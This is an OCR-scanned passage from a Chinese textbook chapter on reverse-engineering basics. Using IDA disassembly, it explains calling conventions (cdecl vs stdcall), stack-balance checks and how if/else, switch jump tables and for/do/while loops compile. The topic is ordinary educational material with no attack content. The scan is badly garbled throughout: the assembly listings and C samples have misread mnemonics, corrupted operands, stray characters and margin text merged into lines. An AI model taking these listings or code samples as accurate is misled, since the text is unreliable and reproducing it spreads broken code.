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ebp 是 恢复 栈 帧 ，retn 就 返回 上 层 函 数 了 。 在 该 反 汇 编 代 码 中 还 有 一 步 没 有 讲 到 ， 也 就 是 cmp 
ebp, esp/call _chkesp， 这 两 句 是 对 _chkesp 函数 的 一 个 调用 。 在 Debug 方式 下 编译 ， 对 几乎 
所 有 的 函数 调用 完成 后 都 会 调用 一 次 _chkesp。 该 函数 的 功能 是 用 来 检查 栈 是 否 平衡 ， 以 保 
证 程序 的 正确 性 。 如 果 栈 不 平 ， 会 给 出 错误 提示 。 这 里 做 个 简单 的 测试 ， 在 主 函 数 的 return 
语句 前 加 一 条 内 联 汇编 ”asm push ebx (只 要 是 改变 esp 或 ebp 寄存 器 值 的 操作 都 可 以 达到 效 
果 )， 然 后 编译 连接 运行 ， 在 输出 后 会 看 到 一 个 错误 的 提示 ， 如 图 5-48 所 示 。 





图 5-48 调用 _chkesp 后 对 栈 平 衡 进行 检查 后 的 出 错 提示 


图 5-48 就 是 _chkesp 函数 在 检测 到 ebp 与 esp 不 平时 给 出 的 提示 框 。 该 功能 只 在 DEBUG 
版 本 中 存在 。 
主 函 数 的 反 汇 编 代 码 中 还 有 一 人 反 汇 编 代 码 如 下 : 


:text:004010B8 push 

.text:004010BA push a aHello ?1 "eTlon 
.text:00401]0BF call eh a 

‘text:004010C4 add esp, 8 

.text:004010C7 MOV [ebpt+var_4], eax 
.text:004010CA mov eax, [ebpt+var. 4] 
:text:004010CD push eax 

text:004010CE push offset aD y a Nr NI 
.text:004010D3 call _printf 

.text:;004010D8 add esp,: 8 

:text:004010DB XOr eax, eax 


首先 几 条 反 汇编 代码 是 push 6/push offset aHello/call j test/add esp, 8/mov [ebp+var 4], 
eax， 这 几 条 反 汇 编 代码 是 主 函 数 对 test() 函 数 的 调用 。 函 数 参数 的 传递 可 以 选择 寄存 器 或 者 
内 存 。 由 于 寄存 器 数量 有 限 ， 几 乎 大 部 分 函数 调用 都 是 通过 内 存 进行 传递 的 。 当 参数 使 用 完 
成 后 ， 需 要 把 参数 所 使 用 的 内 存 进行 回收 。 对 于 VC 开发 环境 而 言 ， 其 默认 的 调用 约定 方式 
是 cdecl。 这 种 函数 调用 约定 对 参数 的 传递 依靠 栈 内 存 ， 在 调用 函数 前 , 会 通过 压 栈 操作 将 参 
数 从 右 往 左 依次 送 入 栈 中 。 在 C 代码 中 ， 对 test0 函 数 的 调用 形式 如 下 : 


int nNum = test ("hello", 6);» 

而 对 应 的 反 汇 编 代 码 为 push 6 / push offset aHello / call j test。 从 压 栈 操作 的 push 指令 来 
看 ， 参 数 是 从 右 往 左 依次 入 栈 的 。 当 函数 返回 时 ， 需 要 将 参数 使 用 的 空间 回收 。 这 里 的 回收 ， 
指 的 是 恢复 esp 寄存 器 的 值 到 函数 调用 前 的 值 。 而 对 于 cdecl 调用 方式 而 言 , 平衡 堆栈 的 操作 
是 由 函数 调用 方 来 做 的 。 从 上 面 的 反 汇 编 代 码 中 可 以 看 到 反 汇 编 代 码 add esp, 8， 它 是 用 于 平 
衡 堆 栈 的 。 该 代码 对 应 的 语言 为 调用 函数 前 的 两 个 push 操作 ， 即 函数 参数 入 栈 的 操作 。 

函数 的 返回 值 通常 保存 在 eax 寄存 器 中 , 这 里 的 返回 值 是 以 return 语句 来 完成 的 返回 值 ， 
并 非 以 参数 接收 的 返回 值 。004010C7 地 址 处 的 反 汇 编 代码 mov [ebp+var 4], eax 是 将 对 j test 
调用 后 的 返回 值 保存 在 [ebp + var 4] 中 ， 这 里 的 [ebp + var 4] 就 相当 于 C 语言 代码 中 的 nNum 
变量 。 道 向 分 析 时 ， 可 以 在 IDA 中 通过 快捷 键 N 来 完成 对 var 4 的 重 命名 。 





全 上 膝 可 许 啊 狂 山中 商 


| 














”第 5 章 黑客 逆向 基础 








在 对 j test 调用 完成 并 将 返回 值 保存 在 var 4 中 后 ， 紧 接着 push eax/push offset aD/call 


_printf/add esp, 8 的 反 汇 编 代 码 应 该 就 不 陌生 了 。 而 最 后 面 的 xor eax，eax 这 人 句 代码 是 将 eax 
童 进行 清 0。 因 为 在 C 语言 代码 中 ，main(0) 函 数 的 返回 值 为 0， 即 return 0;， 因 此 这 里 对 eax 进 
黑 行 了 清 0 操作 。 
客 双击 004010BF 地 址 处 的 callj test， 会 移 到 jtest 的 函数 跳 表 处 ， 反 汇编 代码 如 下 : 
这 .text:0040100A j_ test proc near ; CODE XREF: main+l1Fp 
回 -text:0040100RA jmp _test 
基 .text:0040100A j_ test endp 
础 双击 跳 表 中 的 _test， 到 如 下 反 汇编 处 : 
"ERE 7 ine Od CaseE(PCanR levertr dE) 
a :text:00401020 _test proc near 7; CODE XREF: Jj. test] 


.text:00401020 
.text:00401020 var 40 
‘text:00401020 lpText 
.text:00401020 arg_4 
.text:00401020 


byte ptr -40h 
dword ptr 8 
dword ptr 0Ch 


归于 休 


.text:00401020 push ebp 
.text:00401021 mov ebp, esp 
.text:00401023 sub esp, 40h 
-baxt:O0040L026 push ebx 
.text:00401027 push esi 
.text:00401028 push edi 
-text:00401029 lea edi, [ebp+var 40] 
.text:0040102C MOV ecx, 1l10h 
.text:00401031 ROY eax, 0CCCCCCCCR 
.text:00401036 rep stosd 
:text:00401038 mov eax, [ebp+arg_4] 
.text:0040103B push eax 
.text:0040103C mov ecx, [ebp+lpText] 
“text:0040103F push ecx 
:text:00401040 push offset Format 2 Sa NEN 
| .text:00401045 call 本 
| .text:0040104A add esp, QOCh 
| .text:0040104D MOV esi, esp 
| .text:0040104F push 0 ”azype 
| .text:00401051 push 0 ; lpCaption 
| .text:00401053 mov edx, [ebp+lpText] 
| .text:00401056 pusk edx ; lpText 
.text:00401057 push 0 ; hwnad 
‘text:00401059 call ds: imp_ MessageBoxA@16 ; MessageBoxA (x,x,x,x) 
.text:0040105F cmp ES GSD 
text:00401061 call _ chkesp 
.text:00401066 mov eax, 5 
.text:0040106B pop edi 
.text:0040106C pop 已 SI 
.text:0040106D pop ebx 
.text:0040106E adad esp, 40h 
.text:;:00401071 Cmp ebp esp 
.text:00401073 call chkesp 
.text:00401078 mov espy rebp 
:text:0040107A pop ebp 
:text:0040107B retn 
.text:0040107B test endp 


该 反 汇编 代码 的 开头 部 分 和 结尾 部 分 ， 这 里 不 再 重复 ， 主 要 看 一 下 中 间 的 反 汇编 代码 部 
分 。 中 间 的 部 分 主要 是 printfl) 函 数 和 MessageBoxA() 函 数 的 反 汇编 代码 。 
调用 printf() 函 数 的 反 汇编 代码 如 下 : 


.text:00401038 GT eax, [ebptarg_ 4] 
“text:0040103B push eax 
‘text:0040103C mov ecx, [ebp+ljpText] 
.text:0040103F Eush eCcx 
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.text:00401040 push offset Format pa ra 
.text:00401045 call UpPrintF 

.text:0040104A add esp QC 

调用 MessageBoxA() 函 数 的 反 汇编 代码 如 下 : 

.text;0040104F push 0 1 UTYDe 
-text:00401051 push 0 2 Tocaption 
:text:00401053 mov edx, [ebp+lpText] 

-text:00401056 push edx 2 Jplext 
.text:00401057 push 0 ; hwnd 
.text:00401059 call ds:, imp MessageBoxA@16 ; MessageBoxA (x,x,x,xX) 


比较 以 上 简单 的 两 段 代 码 会 发 现 很 多 不 同 之 处 , 首先 在 调用 完 _printf 后 会 有 add esp, 0Ch 
的 代码 进行 平衡 堆栈 ， 而 调用 MessageBoxA 后 没有 。 对 于 调用 _printf 后 的 add esp, 0Ch， 读 
者 应 该 已 经 熟悉 了 。 为 什么 对 MessageBoxA 函数 的 调用 则 没有 呢 ? 原 因 在 于 ， 在 Windows 
系统 下 , 对 API 函数 的 调用 都 遵循 的 函数 调用 约定 是 stdcall。 对 于 stdcall 这 种 调用 约定 而 言 ， 
参数 依然 是 从 右 往 左 依次 被 送 入 堆栈 ， 而 参数 的 平 栈 是 在 API 函数 内 完成 的 ， 而 不 是 在 函数 
的 调用 方 完成 的 。 在 OD 中 看 一 下 MessageBoxA 函数 在 返回 时 的 平 栈 方式 ， 如 图 5-49 所 示 。 


BBEC | ma ebp, esp 
| 833D BC14D777 | duord ptr [7707148C], 
74 24 je Short 77D5881C 
64:A1 18699808 eax, dword ptr Fs:T18] 
6h Bo 


| FF78 24 p dword ptr [eax+24] 
68 28180777 ?77D71824 

| FF15 Cu120177 HOM CC dword ptr [<E&KERNEL32.TInterlock 

Bax, pax 

| 75 8 jm short 77D5881C 
C705 201BD777 | du D71828] ,1 
6n 00 | pu: 











图 5-49 MessageBoxA 函数 的 平 栈 操 作 


从 图 5-49 中 可 以 看 出 ，MessageBoxA 函数 在 调用 retn 指令 后 跟 了 一 个 10。 这 里 的 10 是 
一 个 16 进 制 数 ，16 进 制 的 10 等 于 10 进 制 的 16。 而 在 为 MessageBoxA 传递 参数 时 ， 每 个 参 
数 是 4 字 节 ，4 个 参数 等 于 16 字 节 ， 因 此 retn 10 除了 有 返回 的 作用 外 ， 还 包含 了 add esp, 10 
的 作用 。 

上 面 两 段 反 汇编 代码 中 除了 平衡 堆栈 的 不 同 外 , 还 有 另外 一 个 明显 的 区 别 。 在 调用 printf 
时 的 指令 为 call_printft， 而 调用 MessageBoxA 时 的 指令 为 call ds: imp MessageBoxA@16。 
printf() 函 数 在 stdio.h 头 文件 中 ， 该 函数 属于 C 语言 的 静态 库 ， 在 连接 时 会 将 其 代码 连接 入 二 
进 制 文 件 中 。 而 MessageBoxA 函数 的 实现 在 user32.dll 这 个 动态 连接 库 中 。 在 代码 中 ， 这 里 
只 留 了 进入 MessageBoxA 函数 的 一 个 地 址 ， 并 没有 具体 的 代码 。MessageBoxA 的 具体 地 址 
存放 在 数据 节 中 ， 因 此 在 反 汇编 代码 中 给 出 了 提示 ， 使 用 了 前 级 “ds:”。“ imp ”表示 导 
入 函数 。MessageBoxA 后 面 的 “@16” 表 示 该 API 函数 有 4 个 参数 ， 即 16/4=4。 


Dp 注 : 多 参 的 AP| 函数 仍然 在 调用 方 进行 平 栈 ， 比 如 wsprintf() 函 数 。 原 因 在 于 ,被 调用 的 函数 无 法 具体 明确 
调用 方 会 传递 几 个 参数 ， 因 此 多 参 函数 无 法 在 函数 内 完成 参数 的 堆栈 平衡 工作 。 
stdcall 是 Windows 下 的 标准 函数 调用 约定 。Windows 提供 的 应 用 层 及 内 核 层 函数 均 使 用 stdcall 的 调用 约 
定 方式 。cdecl 是 C 语言 的 调用 函数 约定 方式 。 
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8. 中) 结 

在 道 向 分 析 函 数 时 ， 首 先 需 要 确定 函数 的 起 始 位 置 ， 这 通常 会 由 IDA 自动 进行 识别 ( 识 
别 不 准确 的 话 ， 就 只 能 手动 识别 了 ); 其 次 需要 掌握 函数 的 调用 约定 和 确定 函数 的 参数 个 数 ， 
确定 函数 的 调用 约定 和 参数 个 数 都 是 通过 平 栈 的 方式 和 平 栈 时 对 esp 操作 的 值 来 进行 判断 
的 ; 最 后 就 是 观察 函数 的 返回 值 ， 这 部 分 通常 就 是 观察 eax 的 值 ， 由 于 return 通常 只 返回 布 
尔 类 型 、 数 值 类 型 相关 的 值 ， 因 此 通过 观察 eax 的 值 可 以 确定 返回 值 的 类 型 ， 确 定 了 返回 值 
的 类 型 后 ， 可 以 进一步 考虑 函数 调用 方 下 一 步 的 动作 。 


5.4.2 if...else... 结 构 分 析 


C 语言 中 有 2 种 分 支 结构 ， 分 别 是 if...else... 结 构 和 switch...case...default... 结 构 。 下 面 
先 来 介绍 证 ..else... 分 支 结构 。 

1.， 并 ..else... 分 支 结 构 例 子 程序 

首先 来 写 一 个 简单 的 C 语言 代码 例子 ， 然 后 对 例子 代码 进行 介绍 。 例 子 代 码 如 下 : 


#incilude <stdio.h> 

jint main't() 
ne a Be 富 2 
se es 
: Drinttln Se Nr Nr a) 
else iF£ (DS go) 

Drintt (sa Ne Nn De 

else 


{ 
printk( sa Nha ec) 


return dy 


} 

2. 逆向 反 汇编 解析 

上 述 代码 非常 短 且 很 简单 ， 用 IDA 看 其 反 汇 编 代 码 。 固 定 模式 的 头 部 和 尾部 位 置 省 略 不 
看 ， 相 信 读 者 已 经 熟悉 了 。 主 要 看 其 关键 的 反 汇编 代码 ， 具 体 如 下 : 


.text:00401028 mov lepptvar dal 
‘text;:0040102F mov lebp+ivar, 8], 1 
text "0040L036 mov [ebpptvar.cl,,2 


以 上 3 行 反 汇编 代码 是 对 定义 的 变量 的 初始 化 ， 在 IDA 中 可 以 通过 快捷 键 将 其 重 命名 。 
将 以 上 3 个 变量 重 命 名 后 ， 看 其 余 的 反 汇编 代码 ， 具 体 如 下 : 





-text:0040103D mov eax, [ebp+var_ 41] 
.text:00401040 cmp eax,, [ebptvar. .81 

text 00401043 jle sunort locn40i058 
.text:00401045 mov ecx, [ebp+vac 4] 
.text:00401048 push CH 

.text:00401049 push offset Format cl NENAY 
.text;:0040104E call .printf 

.text QO0a0L05s add esp 8 

.text:00401056 jmp short lec. 401084 

.textO 0 mm mT songs arc ts 


.text:00401058 
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.text:00401058 loc 401058: 


; CODE XREF: main+33j 


.text:00401058 mov edx, [ebp+var._8] 

.text:0040105B cmp edx [ebptyvarue] 

:text00401L05E 3g short Locu401013 

.text:00401060 mov eax, [ebp+var_8] 

.text:00401063 push eax 

.text:00401064 push offset Format NN 
‘text:00401069 call PEintf 

.text:0040106E add esp, 3 

.text:00401071 jmp short loc 401084 

7 Bee do ed oe 
.text:00401073 

.text:00401073 loc 401073: 7 CODE XREF: main+4Ej 
.text:00401073 mov ecx, [ebp+Var C] 

.text:00401076 push ecCx 

.text:00401077 push offset Format sod Nav 
.text:0040107C call 证 本 闫 主 扩 二 在 

.text:00401081 add esp, 8 

.text:00401084 

text:00401084 loc 401084: ; CODE XREF; main+46j 
.text:00401084 ; main+61j 


将 以 上 反 汇 编 分 为 3 段 进行 观察 ， 第 1 段 的 地 址 范围 是 0040103D 至 00401056， 第 2 段 
的 地 址 范围 是 00401058 至 00401071, 第 3 段 的 地 址 范围 是 00401073 至 00401081。 除 了 第 3 
段 代码 外 ， 前 面 两 段 的 代码 有 一 个 共同 的 特征 :cmp /jxx /printf/jmp。 这 部 分 功能 的 特征 就 
是 if...else... 的 特征 所 在 。 看 一 下 IDA 绘制 的 该 段 反 汇 编 代 码 的 反 汇 编 流 程 结 构 ， 如 图 5-50 
所 示 。 






eax, [ebp*var 4] 
eax, [ebp*var_8] 
Short loc HO1958 








| oc A01058: 
| mou 
| 
y 









edx, 
Shor 


+ uar 


jg 






















ecx, [ebpruar 与 ] eax, [ebp*var 8] 
eax 
offFfset Format 7 “0 


_printf 





ecx 
offset Format ;Sd VIA 
intf 






+yar_ 









offset Format 了 “%) Wr 
_printf 
esp, B 


esp, 8 pp, 有 
Short loc 401084 Short loc S81084 








if...else... 有 反 汇 编 流 程 结构 


图 5-50 


在 C 语言 代码 中 ， 影 响 程序 流程 的 是 两 个 关键 的 比较 ， 分 别 是 “>” 和 “<=”。 在 反 汇 编 
代码 中 ， 影 响 主要 流程 的 是 两 个 条 件 跳 转 指令 ， 分 别 是 “jle” 和 “jg”。C 语言 代码 中 ,“>?” 
(大 于 号 ) 在 反 汇编 中 对 应 的 是 “jle”( 小 于 等 于 则 跳 转 ),“<=”( 小 于 等 于 号 ) 在 反 汇 编 中 
对 应 的 是 “jg”( 大 于 则 跳 转 )。 

注意 观察 00401043 和 0040105E 这 两 个 地 址 ，jxx 指令 会 跳 过 紧 接 着 其 后 面 的 指令 部 分 ， 
而 跳 转 的 目的 地 址 上 面 都 有 一 条 jmp 无 条 件 跳 转 指令 。 也 就 是 说 , jxx 和 jmp 之 间 的 部 分 是 C 
语言 代码 中 比较 表达 式 成 功 后 执行 的 代码 。 在 反 汇 编 代 码 中 ， 如 果 条 件 跳 转 指令 没有 发 生 跳 
转 ， 则 执行 其 后 的 指令 。 这 样 的 反 汇 编 指令 与 C 语言 的 流程 是 相同 的 。 当 条 件 跳 转 指令 发 生 
跳 转 后 ， 执 行 完 相 应 的 指令 后 会 执行 jmp 指令 跳 到 某 个 地 址 。 注 意 观 察 ， 两 条 jmp 跳 转 的 目 
的 地 址 都 为 00401084。 
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3. j 计 ..else... 结 构 小 结 
从 例子 中 可 以 找 出 C 语言 证 ..else... 结 构 与 反 汇 编 代 码 的 对 应 结构 ， 具 体 如 下 : 


于 ...else... 分 又 缚 构 
5.4.3 ”switch 结构 分 析 

前 面 讲解 了 证 ..else.…. 的 分 支 结构 , 接 下 来 介绍 switch...case...default 的 分 支 结 构 。switch 
分 支 结构 是 一 种 比较 灵活 的 结构 ， 它 的 反 汇编 代码 可 以 产生 多 种 形式 ， 这 里 只 介绍 它 的 其 中 
一 种 形式 。 

1，switch 分 支 结构 例子 程序 

按照 惯例 先 写 例子 代码 ， 再 对 例子 代码 进行 介绍 。 例 子 代码 如 下 ; 
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break; 
} 
default: 
{ 


printf ("default \r\n")r 
break; 


} 


return 0; 


1 

2. 逆向 反 汇 编 解析 

对 于 读者 已 经 很 熟悉 的 开始 部 分 和 结尾 部 分 ， 这 里 再 次 省 略 ， 主 要 看 能 与 本 书 代码 相对 
应 的 反 汇编 代码 。 反 汇编 代码 分 两 部 分 来 看 ， 一 部 分 是 看 default 分 支 ， 另 一 部 分 是 看 case 分 
支 。 先 看 一 下 IDA 生成 的 流程 结构 图 ， 如 图 5-51 所 示 。 





























EY 





图 5-51 switch 流程 分 支 图 


在 图 5-51 中 可 以 看 到 2 个 大 的 分 支 ， 在 左边 的 分 支 中 又 有 4 个 小 的 分 支 。 从 整体 结构 上 
来 看 ， 不 同 于 C 语言 的 代码 结构 形式 。 其 实 ， 左边 的 部 分 是 case 部 分 ， 右边 的 部 分 是 default 
部 分 。 

下 面 分 部 分 来 了 解 其 反 汇编 代码 ， 首 先 看 调用 scanf() 函 数 的 部 分 : 


.text:00401028 mov [epp+nNum], 0 
:text:0040102F lea eax, [ebp+nNum] 
.text:00401032 push eax 

:text:00401033 push offset Format 2 1 
.text:00401038 call _scanf 

.text:0040103D add esp, 8 


scanf() 函 数 是 C 语言 的 标准 输入 函数 ， 第 1 个 参数 为 格式 化 字符 串 ， 第 2 个 参数 是 接收 
数据 的 地 址 。 在 0040102F 地 址 处 ， 代 码 lea eax, [ebp + nNum] 将 nNum 变量 的 地 址 送 入 eax 
寄存 器 。 经 过 scanfO) 函 数 的 调用 ，nNum 中 接收 了 用 户 的 输入 。 

通过 scanfO) 函 数 接收 到 用 户 的 输入 后 ， 就 进入 switeh0) 分 支 的 部 分 ， 至 少 在 C 语言 代码 
中 是 这 样 的 。 下 面 看 一 下 反 汇 编 代 码 的 情况 : 


.七 ext:00401040 HOTV ecx, [ebp+nNum] 

.text:00401043 mov [ebp+var 8], ecx 

.text:00401046 了 Or edx: [ebp+var 8] 

.text:00401049 sub edx, 1 

-text:0040104C moOV [ebp+vaz 8], edx 

.text:0040104F cmp [ebp+var 8], 3 ; switch 4 cases 
text:00401053 ja short loc 40109B ; default 
.text:00401055 mov eax, [ebptvar_8] 

text:00401058 jmp ds:off 4010BB[eax*4] ; Switch jump 


00401040 地 址 处 的 代码 是 mov ecx, [ebp + nNum]， 也 就 是 把 nNum 的 值 赋 给 了 ecx 寄存 
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器 。 接 着 00401043 地 址 处 的 代码 是 mov [ebp + var 8], ecx， 这 人 句 将 ecx 的 值 又 赋 给 了 var 8 
这 个 变量 。 但 是 , 在 C 语言 代码 中 只 定义 了 一 个 变量 ， 而 var 8 是 怎么 来 的 ? var 8 是 编译 器 
产生 的 一 个 临时 变量 ， 用 来 临时 保存 一 些 数据 。 接 着 在 00401046 地 址 处 的 代码 又 将 var 8 的 
值 赋 给 了 edx 寄存 器 。 然 后 00401049 和 0040104C 地 址 处 的 代码 将 edx 的 值 减 一 后 又 赋值 给 
了 var_ 8 变量 。 

这 部 分 反 汇编 代码 在 C 语言 代码 中 是 没有 对 应 关系 的 。 但 是 这 部 分 代码 的 用 处 是 什么 
呢 ? 接着 往 下 看 , 0040104F 地 址 处 是 一 条 cmp [ebp +var 8], 3 反 汇编 代码 。 比较 后 , 如 果 var 8 
大 于 3 的 话 ， 那 么 00401053 地 址 处 的 无 符号 条 件 跳 转 指令 ja 将 会 进行 跳 转 ， 去 执行 default 
部 分 的 代码 。0040104F 地 址 处 为 什么 和 3 进行 比较 呢 ? case 分 支 的 范围 是 1 一 4, 而 var 8 在 
和 3 比较 之 前 进行 了 减 一 的 操作 。 如 果 var_8 的 值 的 范围 在 1 一 4， 减 一 后 的 范围 就 变 成 了 0 一 3。 
如 果 var_8 的 值 小 于 等 于 3， 则 说 明 switch 要 执行 case 中 的 部 分 ， 如 果 是 其 他 值 的 话 ， 则 要 
执行 default 流程 。 在 图 5-51 中 ， 流 程 被 分 为 左右 两 部 分 就 是 这 里 的 比较 所 引起 的 。 


py 注 : 为 什么 判断 时 只 判断 是 否 大 于 3 呢 ? 小 于 等 于 3 不 一 定 意味 着 在 0~ 3 的 范围 吧 ? 也 可 能 存在 负数 的 
情况 。 这 样 的 质疑 是 对 的 ， 但 是 在 条 件 分 支 处 使 用 的 条 件 跳 转 指 令 是 “ja”， 它 是 一 个 无 符号 的 条 件 跳 转 指 
令 ， 即 使 存在 负数 也 会 当 整 数 进行 解析 。 


通过 上 面 的 分 析 可 以 发 现 , switch 分 支 对 于 定位 是 执行 case 分 支 还 是 default 分 支 的 方法 
很 高 效 。 如 果 是 执行 default 分 支 ， 那 么 只 需要 比较 一 次 即 可 直接 执行 。 

C 语言 中 ，switch 语句 有 4 个 case 部 分 ， 是 不 是 应 该 比较 4 次 呢 ? 由 于 C 语言 代码 中 的 
case 项 是 一 个 连续 的 序列 ， 因 此 编译 器 又 对 代码 做 了 优化 。00401055 和 00401058 地 址 处 的 两 
名 代码 即 可 准确 找到 要 执行 的 case 分 支 。 再 来 看 一 下 这 两 个 地 址 处 的 反 汇编 代码 ， 具 体 如 下 : 


‘text:00401055 mov eax, [ebp+var 8] 
.text:00401058 jmp ds:off _4010BB[eax*4] ; Switch jump 


00401055 地 址 处 的 代码 将 var 8 的 值 传递 给 了 eax 寄存 器 ， 由 于 前 面 的 代码 没有 发 生 跳 
转 ， 那 么 var 8 的 取 值 范围 必定 在 0~3。00401058 处 的 跳 转 很 奇怪 ， 像 是 一 个 数组 (其 实 就 
是 一 个 数组 ), 数组 的 下 表 由 eax 寄存 器 进行 寻 址 。 下 面 来 看 off 4010BB 处 的 内 容 ， 具体 如 下 : 


.text:004010BB off 4010BB dd offset loc 40105F ; DATA XREF: maint+48r 
.text:004010BB dd offset loc 40106E ; jump table for Switch statement 
.text:004010BB dd offset loc 40107D 

.text:004010BB dd offset loc 40108C 

‘text:004010CB db 35h dup (0CCh) 


其 内 容 为 4 个 连续 的 标号 地 址 ， 分 别 是 loc 40105F、loc 40106E 、loe 40107D 和 
loc_40108C。 这 4 个 标号 地 址 分 别 对 应 4 个 case 对 应 的 代码 。 该 数组 中 保存 了 4 个 值 ， 用 下 
表 索 引 也 刚好 是 0 一 3， 也 就 是 可 以 通过 var_ 8 中 对 应 的 值 进行 访问 。 

关于 switch... case...default 结构 的 分 析 就 介绍 到 这 里 。 其 实 ， 关 于 switch 结构 还 有 3 种 
其 他 形式 ， 比 如 以 递减 《或 递增 ) 的 形式 进行 比较 跳 转 ， 以 建树 的 形式 进行 比较 跳 转 和 稀 下 C 
和 矩阵 的 方式 。 当 然 ，switch 结构 比较 复杂 的 话 ， 还 会 出 现 多 种 形式 的 混合 形式 ， 这 里 不 再 进 
行 过 多 的 讨论 。 

5.4.4 ”循环 结构 分 析 
程序 语言 的 控制 结构 不 外 平分 支 与 循环 ， 学 习 完 分 支 结构 后 自然 要 对 循环 结构 的 反 汇编 
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代码 有 个 了 解 。C 语言 的 循环 结构 有 for 循环 、while 循环 、do 循环 和 goto 循环 。 本 部 分 介 
绍 前 3 种 循环 方式 。 第 
1，for 循环 结构 章 
for 循环 也 可 以 称 为 步 进 循环 , 它 的 特点 是 常用 于 已 经 明确 了 循环 的 范围 。 看 一 个 简单 的 四 
C 语言 代码 ， 具 体 如 下 : 客 
#include <stdio.h> 逆 
向 
main() 基 
int nNum = 0,; nSum = 0) 础 
for ( nNum = 1; nNum <= 100; nNum ++ ) RR 


f 
DSum += nNum; 


] 
brintft (namsisd NeNm,, Sb : 


return 07 


} 
这 是 很 典型 的 求 1 一 100 的 累加 和 的 程序 。 通 过 这 个 程序 来 认识 关于 for 循环 结构 的 反 汇 


编 代 码 。 
.text:00401028 mov [epp+nNum], 0 
-text:0040102F mov lebptnSsuml,. 0 
.text:00401036 mov [ebp+nNum], 1 
,text:0040103D jmp short LOcC COMP 


TSEROPROT NED 
:text:0040103F 


text 0Q0040L03 LOC .STEP: 7 CODE XRER: | maintdnd 
.text:0040103F mov eax, [ebptnNum] 

.text:00401042 add eax, 1 

.text:00401045 mov [ebp+nNum] ， eax 

‘text:00401048 

.text:00401048 LOC_CMP: 2 CODD: XR maint Dy 
.text:00401048 cmp [ebptnNum], 64h 

.text:0040104C jg short LOC ENDEOR 

.text:0040104E mov ecx [ebpthnsuml] 

:text:00401051 add ecx, [ebptnNum] 

.text:00401054 mov [ebptnsum], ecx 

text00401057 jmp short, boOC STEP 


"tGXt O040LOS I 
text O00401059 


“textQ040L059 EEOC ENDFOR: 2 CODE' XRED: malint3e 
:text:00401059 IO edx, [ebp+nSuml 

,text:0040105C push edx 

.text:0040105D push offset Format Sm ANY 
.text:00401062 [oc Wa lo mua 

.text:00401067 add esp, 8 

:text:0040106A 0 eax, eax 


这 次 的 反 汇编 代码 ， 笔 者 修改 了 其 中 的 变量 、 标 号 ， 看 起 来 更 加 直观 。 从 修改 的 标号 来 
看 ，for 结构 可 以 分 为 3 部 分 ， 在 LOC_STEP 上 面 的 部 分 是 初始 化 部 分 ， 在 LOC_STEP 下 面 
的 部 分 是 修改 循环 变量 的 部 分 , 在 LOC_CMP 下 面 和 LOC ENDFOR 上 面部 分 是 比较 循环 条 
件 和 循环 体 的 部 分 。 


for 循环 的 反 汇 编 结 构 如 下 : 
; 初始 化 循环 变量 
jmb LOCnCME 


; 修改 循环 变量 


LOCN STED: 
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LOC CMP: 
; 循环 变量 的 判断 

第 jxx LOC_ENDFOR 
5 7 循环 体 
章 Jjmp LOC_STEP 

LOC_ENDOF : 
黑 再 用 IDA 来 看 一 下 生成 的 流程 结构 图 ， 如 图 5-52 所 示 。 
客 
站 pb eo 中 
有 A 
础 jnp short LOC Ctr 

Wh 













ecx, [ebp*nSun] 
add ecx, [ebp*nMun]l LOC ENOFAR: 

[ebprasun], ecxf |mow edx, [ebp+nSum] 
short LOG SEEP edx 










offset Format “ART 














图 5-52 ”for 结构 的 流程 图 





2.， do...while 循环 结构 
do 循环 的 循环 体 总 是 会 被 执行 一 次 ， 这 是 do 循环 与 while 循环 的 区 别 。 这 里 还 是 1 一 100 
的 累加 和 代码 ， 来 看 一 下 它 的 反 汇编 结构 。 先 看 C 语言 代码 ， 有 具体 如 下 : 


#include <stdio.h> 


int main() 


{ 
int nNuam = 工 nSam = 0; 
do 
{ 
nsunm += nNuam; 
nNum ++7 
} while ( nNum <= 100 ); 
printf("nSum = %d \r\n", nSom); 
return 0; 
} 


do 循环 的 结构 要 比 for 循环 的 结构 简单 很 多 ， 反 汇编 代码 也 少 很 多 。 先 来 看 一 下 IDA 生 
成 的 流程 图 ， 如 图 5-53 所 示 。 





台 ) 





5.4 C 语言 代码 逆向 基础 










































mg ECXTY TZ 
mov eax, CECCCCCCh 
rep stosd 
mov [ebp*nNun]，1 第 
mov [ebp*+nSum] ,$8 5 
= 
里 
eax, [ebp*nSum] 
add eax, [ebp+nNunm]l 客 
mou [ebp*nSun], eax| 逆 
mov ecx, [ebp*+nNum]l 
add ecx, 1 | 向 
mov [ebp*+nNum] , ecxl 基 
[ebp*+nNum] , 64hl 
short LO DT | 础 
edx, [ebp*+nSum] | 
edx 
offset Format Sam = %d Nrvb 
_printf 
esp, 8 
Bax, eax 











图 5-53 ”do 循环 流程 图 


反 汇编 代码 如 下 : 

.text:00401028 mov [ebpt+nNum], 1 

.text:0040102F mov [lebp+nSsum], 0 

.text:00401036 

text:*00401036 LOC DO: 2 GODD RD manni de 
.text:00401036 mov eax, [ebp+nSum] 

.text:00401039 add eax, [ebp+nNum] 

.text:0040103C mo [ebp+nSum], eax 

.text:0040103F mov ecx, [ebp+nNum] 

.text:00401042 add ecx, 1 

.text:00401045 mov [ebp+nNum], ecx 

text:00401048 cmp [ebp+nNum] ， 64h 

.text:0040104C jle short TOC DO 

.text:;0040104E moVv edx, [ebp+nSum] 

.text:00401051 push edx 

.text:00401052 push offset Format 2 "nSnm = Sd VND 
‘text:00401057 CB "printt 

‘text:0040105C add esp, 8 

.text:0040105F XOr eax, eax 


do 循环 的 主体 就 在 LOC DO 和 0040104C 的 jle 之 间 。 其 结构 整理 如 下 : 
;初始 化 循环 变量 
; 执行 循环 体 
; 修改 循环 变量 
; 循环 变量 的 比较 
Uxx TOCDO 
3.， while 循环 结构 
while 循环 与 do 循环 的 区 别 在 于 ， 在 进入 循环 体 之 前 需要 先进 行 一 次 条 件 判断 ， 循 环 体 
有 可 能 因为 循环 条 件 的 不 成 立 而 一 次 也 不 执行 。 看 1 一 100 累加 和 的 while 循环 代码 : 


#include <stdio.h> 


LOC_DO: 





irnt maknt() 
{ 
int nNam = 1 nSsum = 0; 


while ( nNum <= 100 ) 
1 
nsum += nNum; 
nNum ++? 
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printf{"nSum = %d \r\in", nSum); 


第 return 0; 
5 } 
章 再 来 看 一 下 它 的 反 汇 编 代 码 ，while 循环 比 do 循环 多 了 一 个 条 件 的 判断 ， 因 此 会 多 一 条 
黑 | 分 支 。 反 汇编 代码 如 下 : 
客 ,text:00401028 IOV [Ebp+nNin], 1 
逆 .text:0040102F moV [ebp+nSum], 0 
向 .text:00401036 
